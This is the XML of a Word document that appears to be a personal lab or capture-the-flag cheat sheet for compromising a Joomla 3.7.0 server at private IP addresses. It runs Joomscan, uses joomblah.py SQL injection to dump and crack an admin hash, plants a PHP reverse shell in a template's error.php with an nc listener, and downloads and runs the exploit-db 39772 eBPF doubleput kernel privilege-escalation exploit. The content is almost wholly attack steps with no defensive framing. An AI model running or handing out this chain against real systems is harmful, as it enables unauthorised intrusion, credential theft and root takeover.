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1F14A" w14:textId="3CE3E33F" w:rsidR="00241655" w:rsidRDefault="000137AF">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Joomscan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> –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="007B0CB9" w:rsidRPr="007B0CB9">
        <w:t>http://</w:t>
      </w:r>
      <w:r w:rsidR="0084362C" w:rsidRPr="0084362C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0084362C" w:rsidRPr="001779C8">
        <w:t>10.255.254.73</w:t>
      </w:r>
      <w:r w:rsidR="007B0CB9" w:rsidRPr="007B0CB9">
        <w:t>/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B50C402" w14:textId="647C7D55" w:rsidR="000137AF" w:rsidRDefault="000137AF"/>
    <w:p w14:paraId="16E1026B" w14:textId="3FA0F935" w:rsidR="000137AF" w:rsidRDefault="001779C8">
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="001779C8">
        <w:t>search Joomla 3.7.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D9E8ED" w14:textId="0F143F8E" w:rsidR="001779C8" w:rsidRDefault="001779C8">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001779C8">
        <w:t>set</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001779C8">
        <w:t xml:space="preserve"> RHOST 10.255.254.73</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D6E2B6" w14:textId="77777777" w:rsidR="00140665" w:rsidRDefault="00140665"/>
    <w:p w14:paraId="2A4222F0" w14:textId="4643166C" w:rsidR="00C32D18" w:rsidRDefault="00C32D18"/>
    <w:p w14:paraId="16C000C8" w14:textId="5EEAC070" w:rsidR="00C32D18" w:rsidRDefault="00C32D18"/>
    <w:p w14:paraId="6EE562F9" w14:textId="61171C8B" w:rsidR="00C32D18" w:rsidRDefault="00C32D18">
      <w:r>
        <w:t>g</w:t>
      </w:r>
      <w:r w:rsidRPr="00C32D18">
        <w:t>https://github.com/stefanlucas/Exploit-Joomla</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (download</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7CD322" w14:textId="12BC8470" w:rsidR="00C32D18" w:rsidRDefault="00C32D18"/>
    <w:p w14:paraId="6531824B" w14:textId="787122FA" w:rsidR="00C32D18" w:rsidRPr="00BD3929" w:rsidRDefault="00C32D18">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD3929">
        <w:t xml:space="preserve">python3 joomblah.py </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidR="00620166" w:rsidRPr="00BD3929">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="auto"/>
          </w:rPr>
          <w:t>http://10.255.254.73/index.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2757D4FF" w14:textId="235D556F" w:rsidR="00D63C9D" w:rsidRDefault="00D63C9D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>'</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BD3929">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BD3929">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>', 'freddy@norealaddress.net', $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97</w:t>
      </w:r>
      <w:r w:rsidR="006F10E4">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>CVRnGeZsVJwR0kWFlfB1Zu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA338D3" w14:textId="0FD51767" w:rsidR="006F10E4" w:rsidRDefault="006F10E4">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Echo ‘</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3929">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>$2y$10$</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BD3929">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>DpfpYjADpejngxNh9GnmCeyIHCWpL97</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>CVRnGeZsVJwR0kWFlfB1Zu’  &gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCC2C88" w14:textId="44FB364F" w:rsidR="006F10E4" w:rsidRDefault="006F10E4">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>John hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D6F4BC" w14:textId="0874914D" w:rsidR="001D7192" w:rsidRPr="00BD3929" w:rsidRDefault="001D7192">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D7192">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>http://192.168.1.69/administrator/index.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3553DFFA" w14:textId="3834445F" w:rsidR="007476F9" w:rsidRPr="00BD3929" w:rsidRDefault="001D7192">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>username</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00FC6EF9">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>: admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2031C76A" w14:textId="29C58817" w:rsidR="007476F9" w:rsidRDefault="007476F9">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BD3929">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">Password </w:t>
      </w:r>
      <w:r w:rsidR="00CB1008">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3929">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>snoopy</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1A86E637" w14:textId="27FD2B50" w:rsidR="00BD3929" w:rsidRDefault="00BD3929">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Login administrator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36735635" w14:textId="7520969E" w:rsidR="00690D3A" w:rsidRDefault="00690D3A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Go to templates then templates then </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>protostar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7E3F1BA3" w14:textId="62DC0356" w:rsidR="00690D3A" w:rsidRPr="00BD3929" w:rsidRDefault="00690D3A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Edit </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>error.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003E497C">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">  or</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="003E497C">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003E497C">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>index.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="19785CA9" w14:textId="0297D30F" w:rsidR="00140665" w:rsidRDefault="00140665">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BD3929">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>past</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BD3929">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3929">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3929">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3929">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>error.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A51D12">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> for reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF9D9FC" w14:textId="26022148" w:rsidR="00400C9B" w:rsidRDefault="00400C9B">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> –</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>lvnp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1337</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD9CDBB" w14:textId="097AAE1C" w:rsidR="00581A33" w:rsidRPr="00BD3929" w:rsidRDefault="00110EC3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00110EC3">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>192.168.1.213/templates/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00110EC3">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>protostar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00110EC3">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00110EC3">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>error.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003E497C">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidR="00CF3618">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidR="003E497C">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">or </w:t>
      </w:r>
      <w:r w:rsidR="00CF3618">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00CF3618" w:rsidRPr="00110EC3">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>192.168.1.213</w:t>
      </w:r>
      <w:r w:rsidR="00CF3618">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CF3618">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>index.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="73AEA0BF" w14:textId="5258E21C" w:rsidR="00DD63B3" w:rsidRPr="00BD3929" w:rsidRDefault="00DD63B3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BD3929">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>find</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BD3929">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit by </w:t>
      </w:r>
      <w:r w:rsidR="00012F36" w:rsidRPr="00BD3929">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>kernel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45536E80" w14:textId="6FAA7833" w:rsidR="00012F36" w:rsidRDefault="00A7617C">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00012F36" w:rsidRPr="00BD3929">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>4.4.x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61182854" w14:textId="7CD55A99" w:rsidR="005E0626" w:rsidRPr="00B66E45" w:rsidRDefault="00D24584">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Cd /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>( any</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> user can perform in this directory)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6899C04A" w14:textId="5CFBBB2C" w:rsidR="005431C7" w:rsidRPr="005431C7" w:rsidRDefault="00B66E45" w:rsidP="005431C7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2"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidR="003A1F18">
        <w:t>get</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005431C7">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidR="001E0410" w:rsidRPr="00C82D35">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          </w:rPr>
          <w:t>https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="001E0410">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">      (from the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001E0410">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>dbexploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001E0410">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184CEC8C" w14:textId="6827A6AC" w:rsidR="00620166" w:rsidRDefault="00620166"/>
    <w:p w14:paraId="75C99CE4" w14:textId="4D7D4280" w:rsidR="00B66E45" w:rsidRDefault="00B66E45">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B66E45">
        <w:t>tar</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B66E45">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B66E45">
        <w:t>xvf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B66E45">
        <w:t xml:space="preserve"> exploit.tar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A721F5E" w14:textId="10067CBF" w:rsidR="00E777F3" w:rsidRDefault="00E777F3">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E777F3">
        <w:lastRenderedPageBreak/>
        <w:t>cd</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E777F3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E777F3">
        <w:t>ebpf_mapfd_doubleput_exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5B598B8B" w14:textId="4038A950" w:rsidR="00280607" w:rsidRDefault="00BE4567">
      <w:r>
        <w:t>./</w:t>
      </w:r>
      <w:r w:rsidR="00280607" w:rsidRPr="00280607">
        <w:t>compile.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFF7838" w14:textId="4CA5E8F3" w:rsidR="00104FBC" w:rsidRPr="00BD3929" w:rsidRDefault="00104FBC">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00104FBC">
        <w:t>./</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00104FBC">
        <w:t>doubleput</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="00104FBC" w:rsidRPr="00BD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4F"/>
    <w:rsid w:val="00012F36"/>
    <w:rsid w:val="000137AF"/>
    <w:rsid w:val="00104FBC"/>
    <w:rsid w:val="00110EC3"/>
    <w:rsid w:val="00140665"/>
    <w:rsid w:val="001779C8"/>
    <w:rsid w:val="001D7192"/>
    <w:rsid w:val="001E0410"/>
    <w:rsid w:val="0022344F"/>
    <w:rsid w:val="00241655"/>
    <w:rsid w:val="00280607"/>
    <w:rsid w:val="003A1F18"/>
    <w:rsid w:val="003E497C"/>
    <w:rsid w:val="00400C9B"/>
    <w:rsid w:val="004A5385"/>
    <w:rsid w:val="005431C7"/>
    <w:rsid w:val="00581A33"/>
    <w:rsid w:val="005E0626"/>
    <w:rsid w:val="00620166"/>
    <w:rsid w:val="00690D3A"/>
    <w:rsid w:val="006F10E4"/>
    <w:rsid w:val="007476F9"/>
    <w:rsid w:val="007B0CB9"/>
    <w:rsid w:val="0084362C"/>
    <w:rsid w:val="00A51D12"/>
    <w:rsid w:val="00A7617C"/>
    <w:rsid w:val="00B66E45"/>
    <w:rsid w:val="00BD3929"/>
    <w:rsid w:val="00BE4567"/>
    <w:rsid w:val="00C32D18"/>
    <w:rsid w:val="00CB1008"/>
    <w:rsid w:val="00CF3618"/>
    <w:rsid w:val="00D24584"/>
    <w:rsid w:val="00D63C9D"/>
    <w:rsid w:val="00DD63B3"/>
    <w:rsid w:val="00E777F3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E25"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{EB700C7A-42B0-41C3-8144-72217E95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1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1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1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3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exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://10.255.254.73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35</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-12-06T15:57:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-03-01T16:55:00Z</dcterms:modified>
</cp:coreProperties>
</file>